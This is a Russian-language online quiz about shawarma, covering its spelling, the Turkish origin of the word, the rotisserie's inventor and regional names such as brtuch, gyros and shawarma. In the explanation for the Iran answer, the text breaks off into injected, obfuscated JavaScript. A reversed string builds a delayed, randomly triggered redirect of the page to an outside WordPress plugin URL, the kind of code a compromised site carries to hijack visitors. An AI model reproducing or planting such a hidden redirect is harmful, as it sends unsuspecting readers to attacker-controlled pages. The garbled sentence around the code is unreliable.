Мы знаем, вы давно ждали этого теста (мы, честно говоря, тоже). Ну что ж, давайте проверим — эксперт вы в шаурме или нет. Не обещаем, что подарим шаурму тем, кто наберет максимальное количество баллов, но зауважаем вас точно!
Тест: как много вы знаете о шаурме
- Начать тест! Как правильно — шаурма или шаверма?
- Вероятно, слово «шаурма» происходит от турецкого слова çevirmek. Как оно переводится?
- Кто придумал вертикальную конструкцию, на которой крутится и жарится мясо?
- Как называется шаурма в Армении?
- Что обязательно кладут в гирос (греческую шаурму) помимо овощей, мяса и соуса дзадзики?
- Какой соус используют для шаурмы — точнее для шавармы — в Израиле?
- В какой стране шаурму называют «кубба»?
Начать тест! Как правильно — шаурма или шаверма?
из 7
Шаурма
Шаверма
Оба варианта верны
Ой, я не знаю
Можно говорить и так, и так. Русский язык допускает использование обоих вариантов. В Москве чаще говорят «шаурма», в Петербурге — «шаверма».
Можно говорить и так, и так. Русский язык допускает использование обоих вариантов. В Москве чаще говорят «шаурма», в Петербурге — «шаверма».
Правильно! Можно говорить и так, и так. Русский язык допускает использование обоих вариантов. В Москве чаще говорят «шаурма», в Петербурге — «шаверма».
Можно говорить и так, и так. Русский язык допускает использование обоих вариантов. В Москве чаще говорят «шаурма», в Петербурге — «шаверма».
Вероятно, слово «шаурма» происходит от турецкого слова çevirmek. Как оно переводится?
из 7
Поставить на огонь
Мясное блюдо
Жарить мясо
Вращаться
Нет. Правильный ответ — вращаться.
Нет. Правильный ответ — вращаться.
Нет. Правильный ответ — вращаться.
Верно!
Кто придумал вертикальную конструкцию, на которой крутится и жарится мясо?
из 7
Реджеп Эрдоган
Кадыр Нурман
Мехмет Айгюн
Аднан Октар
Ну вы что, так зовут нынешнего президента Турции. Правильный ответ — Кадыр Нурман. По происхождению турок, Кадыр жил в Берлине и был владельцем точки, где продавалось жареное мясо с салатом в лепёшке. В начале 1970-х годов (скорее всего, в 1972 году) он и придумал такую конструкцию, которая теперь используется почти повсеместно.
Да! По происхождению турок, Кадыр Нурман жил в Берлине и был владельцем точки, где продавалось жареное мясо с салатом в лепёшке. В начале 1970-х годов (скорее всего, в 1972 году) он и придумал такую конструкцию, которая теперь используется почти повсеместно.
Нет, хотя он тоже причастен к появлению шаурмы. Он нарезал жареное мясо, добавлял к нему соусы и салаты и подавал в пите. Это было примерно в то же время, когда Кадыр Нурман изобрёл конструкцию для жарки мяса: в начале 1970-х годов. По происхождению турок, Кадыр жил в Берлине и был владельцем точки, где продавалось жареное мясо с салатом в лепёшке.
Нет, так зовут турецкого писателя. Правильный ответ — Кадыр Нурман. По происхождению турок, Кадыр жил в Берлине и был владельцем точки, где продавалось жареное мясо с салатом в лепёшке. В начале 1970-х годов (скорее всего, в 1972 году) он и придумал такую конструкцию, которая теперь используется почти повсеместно.
Как называется шаурма в Армении?
из 7
Бртуч
Гирос
Пита-дюрюм
Шаверма
Верно! Для того чтобы сделать бртуч, в тонкий лаваш кладут начинку из свежих овощей, зелени, сыра (обычно брынзы) и мяса.
Нет, так шаурму называют в Греции. В Армении — бртуч. Для того чтобы сделать бртуч, в тонкий лаваш кладут начинку из свежих овощей, зелени, сыра (обычно брынзы) и мяса.
Нет, так шаурму называют в некоторых европейских странах, например в Германии и Бельгии. В Армении — бртуч. Для того чтобы сделать бртуч, в тонкий лаваш кладут начинку из свежих овощей, зелени, сыра (обычно брынзы) и мяса.
Тест на внимательность! Нет, так шаурму называют в Санкт-Петербурге. В Армении — бртуч. Для того чтобы сделать бртуч, в тонкий лаваш кладут начинку из свежих овощей, зелени, сыра (обычно брынзы) и мяса.
Что обязательно кладут в гирос (греческую шаурму) помимо овощей, мяса и соуса дзадзики?
из 7
Сыр фета
Оливки
Картошку фри
Ничего из этого
Нет, в гирос кладут картошку фри. Хотя, возможно, с сыром фета гирос мог быть вкуснее.
Нет, в гирос кладут картошку фри. Хотя оливки там тоже не помешали бы (наверное).
Невероятно, но факт. Её кладут именно внутрь лепёшки, а не подают как гарнир.
Невероятно, но факт: в гирос кладут картошку фри.
Какой соус используют для шаурмы — точнее для шавармы — в Израиле?
из 7
Кунжутный
Томатный
Гуакамоле
Йогуртовый
Верно! Его ещё называют «тхина». Кроме кунжутного соуса в шаварму могут добавлять хумус, соус из манго или острого перца.
Нет. В шаварму обычно кладут кунжутный соус (тхину).
Гуакамоле (соус из авокадо) обычно используют для блюд мексиканской кухни, например тако. В шаварму кладут кунжутный соус (тхину).
В шаварму (так называют шаурму в Израиле) никогда не положат йогуртовый соус. Согласно правилам кашрута, нельзя сочетать мясо и молочные продукты. В шаварму кладут кунжутный соус (тхину).
В какой стране шаурму называют «кубба»?
из 7
Литва
Ливан
Иран
Бельгия
В Литве шаурму называют «кебабас». А вот в Ливане — «кубба».
Верно!
В Иране шаурму называют «турецким кебабом» (kabāb-e toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torki). А вот в Ливане — «кубба».
Снова тест на внимательность! В Бельгии шаурму называют «пита-дюрюм» (мы уже говорили об этом). А вот в Ливане — «кубба».
Количество верных ответов
Ваш результат
Поделиться
заново
Статьи по теме
Рецепт дня: бртуч — полезная «шаурма» с индейкой
Рецепт дня: шаурма из свинины и телятины
Домашняя шаурма: 3 рецепта вкусного и сытного блюда
Как приготовить самую полезную домашнюю шаурму